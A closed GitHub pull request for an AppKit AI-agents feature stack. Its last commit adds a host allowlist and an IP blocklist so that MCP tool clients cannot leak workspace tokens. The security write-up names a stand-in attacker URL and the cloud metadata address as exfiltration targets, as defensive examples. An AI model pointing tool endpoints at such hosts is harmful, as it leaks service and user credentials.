feat(appkit): zero-trust MCP host policy with URL allowlist and scoped auth#307
Closed
MarioCadenas wants to merge 6 commits intoagent/v2/6-apps-docsfrom
Closed
feat(appkit): zero-trust MCP host policy with URL allowlist and scoped auth#307MarioCadenas wants to merge 6 commits intoagent/v2/6-apps-docsfrom
MarioCadenas wants to merge 6 commits intoagent/v2/6-apps-docsfrom
Conversation
Second layer of the agents feature. Adds the primitives for defining
agent tools and implements them on every core ToolProvider plugin.
### User-facing factories
- `tool(config)` — inline function tools backed by a Zod schema. Auto-
generates JSON Schema for the LLM via `z.toJSONSchema()` (stripping
the top-level `$schema` annotation that Gemini rejects), runtime-
validates tool-call arguments, returns an LLM-friendly error string
on validation failure so the model can self-correct.
- `mcpServer(name, url)` — tiny factory for hosted custom MCP server
configs. Replaces the verbose
`{ type: "custom_mcp_server", custom_mcp_server: { app_name, app_url } }`
wrapper.
- `FunctionTool` / `HostedTool` types + `isFunctionTool` / `isHostedTool`
type guards. `HostedTool` is a union of Genie, VectorSearch, custom
MCP, and external-connection configs.
- `ToolkitEntry` + `ToolkitOptions` types + `isToolkitEntry` guard.
`AgentTool = FunctionTool | HostedTool | ToolkitEntry` is the canonical
union later PRs spread into agent definitions.
### Internal registry + JSON Schema helper
- `defineTool(config)` + `ToolRegistry` — plugin authors' internal shape
for declaring a keyed set of tools with Zod-typed handlers.
- `toolsFromRegistry()` — produces the `AgentToolDefinition[]` exposed
via `ToolProvider.getAgentTools()`.
- `executeFromRegistry()` — validates args then dispatches to the
handler. Returns LLM-friendly errors on bad args.
- `toToolJSONSchema()` — shared helper at
`packages/appkit/src/plugins/agents/tools/json-schema.ts` that wraps
`toJSONSchema()` and strips `$schema`. Used by `tool()`,
`toolsFromRegistry()`, and `buildToolkitEntries()`.
- `buildToolkitEntries(pluginName, registry, opts?)` — converts a
plugin's internal `ToolRegistry` into a keyed record of `ToolkitEntry`
markers, honoring `prefix` / `only` / `except` / `rename`.
### MCP client
- `AppKitMcpClient` — minimal JSON-RPC 2.0 client over SSE, zero deps.
Handles auth refresh, per-server connection pooling, and tool
definition aggregation.
- `resolveHostedTools()` — maps `HostedTool` configs to Databricks MCP
endpoint URLs.
### ToolProvider surfaces on core plugins
- **analytics** — `query` tool (Zod-typed, asUser dispatch)
- **files** — per-volume tool family: `${volumeKey}.{list,read,exists,metadata,upload,delete}` (dynamically named from the plugin's volume config)
- **genie** — per-space tool family: `${alias}.{sendMessage,getConversation}` (dynamically named from the plugin's spaces config)
- **lakebase** — `query` tool
Each plugin gains `getAgentTools()` + `executeAgentTool()` satisfying
the `ToolProvider` interface, plus a `.toolkit(opts?)` method that
returns a record of `ToolkitEntry` markers for later spread into agent
definitions.
### Test plan
- 58 new tests across tool primitives + plugin ToolProvider surfaces
- Full appkit vitest suite: 1212 tests passing
- Typecheck clean
- Build clean, publint clean
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…nContext mediator
Third layer: the substrate every downstream PR relies on. No user-
facing API changes here; the surface for this PR is the mediator
pattern, lifecycle semantics, and factory stamping.
### Split Plugin construction from context binding
`Plugin` constructors become pure — no `CacheManager.getInstanceSync()`,
no `TelemetryManager.getProvider()`, no `PluginContext` wiring inside
`constructor()`. That work moves to a new lifecycle method:
```ts
interface BasePlugin {
attachContext?(deps: {
context?: unknown;
telemetryConfig?: TelemetryOptions;
}): void;
}
```
`createApp` calls `attachContext()` on every plugin after all
constructors have run, before `setup()`. This lets factories return
`PluginData` tuples at module scope without pulling core services into
the import graph — a prerequisite for later PRs that construct agent
definitions before `createApp`.
### PluginContext mediator
`packages/appkit/src/core/plugin-context.ts` — new class that mediates
all inter-plugin communication:
- **Route buffering**: `addRoute()` / `addMiddleware()` buffer until
the server plugin calls `registerAsRouteTarget()`, then flush via
`addExtension()`. Eliminates plugin-ordering fragility.
- **ToolProvider registry**: `registerToolProvider(name, plugin)` +
live `getToolProviders()`. Typed discovery of tool-exposing plugins.
- **User-scoped tool execution**: `executeTool(req, pluginName,
localName, args, signal?)` resolves the provider, wraps in
`asUser(req)` for OBO, opens a telemetry span, applies a 30s
timeout, dispatches, returns.
- **Lifecycle hooks**: `onLifecycle('setup:complete' | 'server:ready'
| 'shutdown', cb)` + `emitLifecycle(event)`. Callback errors don't
block siblings.
### `toPlugin` stamps `pluginName`
`packages/appkit/src/plugin/to-plugin.ts` — the factory now attaches a
read-only `pluginName` property to the returned function. Later PRs'
`fromPlugin(factory)` reads it to identify which plugin a factory
refers to without needing to construct an instance. `NamedPluginFactory`
type exported for consumers who want to type-constrain factories.
### Server plugin defers start to `setup:complete`
`ServerPlugin.setup()` no longer calls `extendRoutes()` synchronously.
It subscribes to the `setup:complete` lifecycle event via
`PluginContext` and starts the HTTP server there. This ensures that
any deferred-phase plugin (agents plugin in a later PR) has had a
chance to register routes via `PluginContext.addRoute()` before the
server binds. Removes the `plugins` field from `ServerConfig` (routes
are now discovered via the context, not a config snapshot).
### Test plan
- 25 new PluginContext tests (route buffering, tool provider registry,
executeTool paths, lifecycle hooks, plugin metadata)
- Updated AppKit lifecycle tests to inject `context` instead of
`plugins`
- Full appkit vitest suite: 1237 tests passing
- Typecheck clean across all 8 workspace projects
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…agents
The main product layer. Turns an AppKit app into an AI-agent host with
markdown-driven agent discovery, code-defined agents, sub-agents, and
a standalone run-without-HTTP executor.
### `createAgent(def)` — pure factory
`packages/appkit/src/core/create-agent-def.ts`. Returns the passed-in
definition after cycle-detecting the sub-agent graph. No adapter
construction, no side effects — safe at module top-level. The returned
`AgentDefinition` is plain data, consumable by either `agents({ agents
})` or `runAgent(def, input)`.
### `agents()` plugin
`packages/appkit/src/plugins/agents/agents.ts`. `AgentsPlugin` class:
- Loads markdown agents from `config/agents/*.md` (configurable dir)
via real YAML frontmatter parsing (`js-yaml`). Frontmatter schema:
`endpoint`, `model`, `toolkits`, `tools`, `default`, `maxSteps`,
`maxTokens`, `baseSystemPrompt`. Unknown keys logged, invalid YAML
throws at boot.
- Merges code-defined agents passed via `agents({ agents: { name: def
} })`. Code wins on key collision.
- For each agent, builds a per-agent tool index from:
1. Sub-agents (`agents: {...}`) — synthesized as `agent-<key>`
tools on the parent.
2. Explicit tool record entries — `ToolkitEntry`s, inline
`FunctionTool`s, or `HostedTool`s.
3. Auto-inherit (if nothing explicit) — pulls every registered
`ToolProvider` plugin's tools. Asymmetric default: markdown
agents inherit (`file: true`), code-defined agents don't (`code:
false`).
- Mounts `POST /invocations` (OpenAI Responses compatible) + `POST
/chat`, `POST /cancel`, `GET /threads/:id`, `DELETE /threads/:id`,
`GET /info`.
- SSE streaming via `executeStream`. Tool calls dispatch through
`PluginContext.executeTool(req, pluginName, localName, args, signal)`
for OBO, telemetry, and timeout.
- Exposes `appkit.agent.{register, list, get, reload, getDefault,
getThreads}` runtime helpers.
### `runAgent(def, input)` — standalone executor
`packages/appkit/src/core/run-agent.ts`. Runs an `AgentDefinition`
without `createApp` or HTTP. Drives the adapter's event stream to
completion, executing inline tools + sub-agents along the way.
Aggregates events into `{ text, events }`. Useful for tests, CLI
scripts, and offline pipelines. Hosted/MCP tools and plugin toolkits
require the agents plugin and throw clear errors with guidance.
### Event translation and thread storage
- `AgentEventTranslator` — stateful converter from internal
`AgentEvent`s to OpenAI Responses API `ResponseStreamEvent`s with
sequence numbers and output indices.
- `InMemoryThreadStore` — per-user conversation persistence. Nested
`Map<userId, Map<threadId, Thread>>`. Implements `ThreadStore` from
shared types.
- `buildBaseSystemPrompt` + `composeSystemPrompt` — formats the
AppKit base prompt (with plugin names and tool names) and layers
the agent's instructions on top.
### Frontmatter loader
`load-agents.ts` — reads `*.md` files, parses YAML frontmatter with
`js-yaml`, resolves `toolkits: [...]` entries against the plugin
provider index at load time, wraps ambient tools (from `agents({
tools: {...} })`) for `tools: [...]` frontmatter references.
### Plumbing
- Adds `js-yaml` + `@types/js-yaml` deps.
- Manifest mounts routes at `/api/agent/*` (singular — matches
`appkit.agent.*` runtime handle).
- Exports from the main barrel: `agents`, `createAgent`, `runAgent`,
`AgentDefinition`, `AgentsPluginConfig`, `AgentTool`, `ToolkitEntry`,
`ToolkitOptions`, `BaseSystemPromptOption`, `PromptContext`,
`isToolkitEntry`, `loadAgentFromFile`, `loadAgentsFromDir`.
### Test plan
- 60 new tests: agents plugin lifecycle, markdown loading, code-agent
registration, auto-inherit asymmetry, sub-agent tool synthesis,
cycle detection, event translator, thread store, system prompt
composition, standalone `runAgent`.
- Full appkit vitest suite: 1297 tests passing.
- Typecheck clean across all 8 workspace projects.
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…esolver
DX centerpiece. Introduces the symbol-marker pattern that collapses
plugin tool references in code-defined agents from a three-touch dance
to a single line, and extracts the shared resolver that the agents
plugin, auto-inherit, and standalone runAgent all now go through.
### `fromPlugin(factory, opts?)` — the marker
`packages/appkit/src/plugins/agents/from-plugin.ts`. Returns a spread-
friendly `{ [Symbol()]: FromPluginMarker }` record. The symbol key is
freshly generated per call, so multiple spreads of the same plugin
coexist safely. The marker's brand is a globally-interned
`Symbol.for("@databricks/appkit.fromPluginMarker")` — stable across
module boundaries.
### `resolveToolkitFromProvider(pluginName, provider, opts?)`
`packages/appkit/src/plugins/agents/toolkit-resolver.ts`. Single source
of truth for "turn a ToolProvider into a keyed record of `ToolkitEntry`
markers". Prefers `provider.toolkit(opts)` when available (core plugins
implement it), falls back to walking `getAgentTools()` and synthesizing
namespaced keys (`${pluginName}.${localName}`) for third-party
providers, honoring `only` / `except` / `rename` / `prefix` the same
way.
Used by three call sites, previously all copy-pasted:
1. `AgentsPlugin.buildToolIndex` — fromPlugin marker resolution pass
2. `AgentsPlugin.applyAutoInherit` — markdown auto-inherit path
3. `runAgent` — standalone-mode plugin tool dispatch
### `AgentsPlugin.buildToolIndex` — symbol-key resolution pass
Before the existing string-key iteration, `buildToolIndex` now walks
`Object.getOwnPropertySymbols(def.tools)`. For each `FromPluginMarker`,
it looks up the plugin by name in `PluginContext.getToolProviders()`,
calls `resolveToolkitFromProvider`, and merges the resulting entries
into the per-agent index. Missing plugins throw at setup time with a
clear `Available: ...` listing — wiring errors surface on boot, not
mid-request.
`hasExplicitTools` now counts symbol keys too, so a
`tools: { ...fromPlugin(x) }` record correctly disables auto-inherit
on code-defined agents.
### Type plumbing
- `AgentTools` type: `{ [key: string]: AgentTool } & { [key: symbol]:
FromPluginMarker }`. Preserves string-key autocomplete while
accepting marker spreads under strict TS.
- `AgentDefinition.tools` switched to `AgentTools`.
### `runAgent` gains `plugins?: PluginData[]`
`packages/appkit/src/core/run-agent.ts`. When an agent def contains
`fromPlugin` markers, the caller passes plugins via
`RunAgentInput.plugins`. A local provider cache constructs each plugin
and dispatches tool calls via `provider.executeAgentTool()`. Runs as
service principal (no OBO — there's no HTTP request). If a def
contains markers but `plugins` is absent, throws with guidance.
### Exports
`fromPlugin`, `FromPluginMarker`, `isFromPluginMarker`, `AgentTools`
added to the main barrel.
### Test plan
- 14 new tests: marker shape, symbol uniqueness, type guard,
factory-without-pluginName error, fromPlugin marker resolution in
AgentsPlugin, fallback to getAgentTools for providers without
.toolkit(), symbol-only tools disables auto-inherit, runAgent
standalone marker resolution via `plugins` arg, guidance error when
missing.
- Full appkit vitest suite: 1311 tests passing.
- Typecheck clean.
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…template
Final layer of the agents feature stack. Everything needed to
exercise, demonstrate, and learn the feature.
### Reference application: agent-app
`apps/agent-app/` — a standalone app purpose-built around the agents
feature. Ships with:
- `server.ts` — full example of code-defined agents via `fromPlugin`:
```ts
const support = createAgent({
instructions: "…",
tools: {
...fromPlugin(analytics),
...fromPlugin(files),
get_weather,
"mcp.vector-search": mcpServer("vector-search", "https://…"),
},
});
await createApp({
plugins: [server({ port }), analytics(), files(), agents({ agents: { support } })],
});
```
- `config/agents/assistant.md` — markdown-driven agent alongside the
code-defined one, showing the asymmetric auto-inherit default.
- Vite + React 19 + TailwindCSS frontend with a chat UI.
- Databricks deployment config (`databricks.yml`, `app.yaml`) and
deploy scripts.
### dev-playground chat UI + demo agent
`apps/dev-playground/client/src/routes/agent.route.tsx` — chat UI with
inline autocomplete (hits the `autocomplete` markdown agent) and a
full threaded conversation panel (hits the default agent).
`apps/dev-playground/server/index.ts` — adds a code-defined `helper`
agent using `fromPlugin(analytics)` alongside the markdown-driven
`autocomplete` agent in `config/agents/`. Exercises the mixed-style
setup (markdown + code) against the same plugin list.
`apps/dev-playground/config/agents/*.md` — both agents defined with
valid YAML frontmatter.
### Docs
`docs/docs/plugins/agents.md` — progressive five-level guide:
1. Drop a markdown file → it just works.
2. Scope tools via `toolkits:` / `tools:` frontmatter.
3. Code-defined agents with `fromPlugin()`.
4. Sub-agents.
5. Standalone `runAgent()` (no `createApp` or HTTP).
Plus a configuration reference, runtime API reference, and frontmatter
schema table.
`docs/docs/api/appkit/` — regenerated typedoc for the new public
surface (fromPlugin, runAgent, AgentDefinition, AgentsPluginConfig,
ToolkitEntry, ToolkitOptions, all adapter types, and the agents
plugin factory).
### Template
`template/appkit.plugins.json` — adds the `agent` plugin entry so
`npx @databricks/appkit init --features agent` scaffolds the plugin
correctly.
### Test plan
- Full appkit vitest suite: 1311 tests passing
- Typecheck clean across all 8 workspace projects
- `pnpm docs:build` clean (no broken links)
- `pnpm --filter=@databricks/appkit build:package` clean, publint
clean
Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
…d auth Closes the MCP-URL token-exfiltration surface identified in the agents stack review. Before this change, `AppKitMcpClient` accepted any `http(s)://` URL as a hosted tool endpoint and forwarded the service-principal token (on `initialize`/`tools/list`) plus the end-user OBO token (on `tools/call`) to whatever host the developer wrote into `mcpServer(name, url)`. A compromised or mistyped URL, or one pointed at `http://169.254.169.254/latest/meta-data/`, would leak workspace credentials on connect — no user interaction required. ### Policy surface New `mcp` field on `AgentsPluginConfig`: ```ts agents({ mcp: { trustedHosts: ["mcp.corp.internal"], allowLocalhost: true, // default: NODE_ENV !== "production" }, }); ``` By default only same-origin Databricks workspace URLs are reachable. Workspace credentials (SP or OBO) are *never* forwarded to non-workspace hosts — trusted external MCP servers must authenticate themselves. ### Gates enforced at connect() 1. Only `http(s):` schemes. 2. `http://` refused for everything except localhost in dev mode. 3. Hostname must match workspace, equal localhost (if permitted), or be in `trustedHosts`. 4. Resolved DNS addresses must not land in loopback, RFC1918, CGNAT, link-local (blocks cloud metadata 169.254.169.254), ULA, or multicast ranges. IP-literal URLs in these ranges are rejected without a DNS lookup. Malformed IPs fail-closed. ### Auth scoping `AppKitMcpClient.callTool` drops any caller-supplied `Authorization` header when the destination's `forwardWorkspaceAuth` was `false` at connect time. `sendRpc` / `sendNotification` never invoke the workspace `authenticate()` closure when forwarding is disallowed. ### Tests New `mcp-host-policy.test.ts` (42 tests) covers: - trustedHosts normalization, NODE_ENV default, invalid workspace URL - same-origin admit with auth, trusted host admit without auth - plaintext http rejection (including "same host wrong scheme") - non-http(s) scheme rejection - case-insensitive hostname match - IP blocklist: RFC1918, link-local, CGNAT, 0.0.0.0/8, multicast, loopback (gated by allowLocalhost), ULA, link-local IPv6, IPv4-mapped IPv6, malformed IP fail-closed - DNS-backed assertResolvedHostSafe: public, metadata, RFC1918, DNS failure, empty result, mixed-result "split DNS" defense New `mcp-client.test.ts` (8 tests) covers the integrated client: - connect rejects non-allowlisted host without any fetch - connect rejects plaintext http without any fetch - connect rejects DNS-resolves-to-blocked-IP without any fetch - SP token attached only on same-origin workspace RPCs - No auth header on any RPC to trusted external host - callTool drops OBO token when destination is external - callTool forwards OBO when destination is workspace - callTool falls back to SP when no OBO override Full appkit suite: 1361 tests passing (up from 1311). Typecheck + biome + knip + generate:types all clean. ### Drive-by - `json-schema.ts` formatting violation fixed (pre-existing biome drift on the stack tip that would fail CI regardless). - `AppKitMcpClient` now accepts an optional `{ dnsLookup, fetchImpl }` for dependency injection in tests. Refs: S1 in the stack security plan (Tier 1 — critical). Signed-off-by: MarioCadenas <MarioCadenas@users.noreply.github.com>
Collaborator
Author
|
Closing — this fix has been split and folded into the stack where each piece belongs: policy module + client + tests into #302, |
4a441d2 to
d16cdd5
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Closes the critical MCP-URL token-exfiltration surface identified in the agents stack review (S1 in the security plan).
The problem
Before this change,
AppKitMcpClientaccepted any absolutehttp(s)://URL as a hosted tool endpoint. It:initialize/notifications/initialized/tools/listduringconnect(), to any URL — including a developer-suppliedmcpServer("x", "https://attacker.example.com/mcp").tools/callto the same unchecked URL.http://for any host.169.254.169.254(EC2/Databricks metadata), RFC1918, or CGNAT IPs.Result: one mistyped or compromised MCP URL leaked SP + OBO workspace credentials without any user interaction.
What ships
A new
mcpblock onAgentsPluginConfig:```ts
agents({
mcp: {
trustedHosts: ["mcp.corp.internal"],
allowLocalhost: true, // default: NODE_ENV !== "production"
},
});
```
Rules enforced before the first byte is sent on every MCP URL (
connect,tools/call,notifications/initialized):http:andhttps:schemes.http://refused except forlocalhost/127.0.0.1/::1whenallowLocalhostis on.trustedHosts.10/8,172.16/12,192.168/16), CGNAT (100.64/10), link-local (169.254/16— covers cloud metadata),0.0.0.0/8, multicast (>=224.0.0.0), ULA (fc00::/7), IPv6 link-local (fe80::/10), or IPv4-mapped IPv6 equivalents. IP-literal URLs in these ranges are rejected without a DNS lookup; malformed IPs fail-closed.AppKitMcpClient.callTooldrops caller-suppliedAuthorizationheaders (typically the OBO bearer) whenever the destination was admitted withforwardWorkspaceAuth: false.sendRpc/sendNotificationnever invoke the workspaceauthenticate()closure on those routes.Tests
New — `mcp-host-policy.test.ts` (42 tests)
Covers the pure policy unit:
New — `mcp-client.test.ts` (8 tests)
Covers the integrated client with a recording `fetchImpl` and injected `dnsLookup`:
Gates
Non-goals / follow-ups (not in this PR)
Drive-bys
Base
This PR targets `agent/v2/6-apps-docs` so it lands on top of the agent stack (#301 → #306). Review + merge order is #301 → #306 first, then this.
Test plan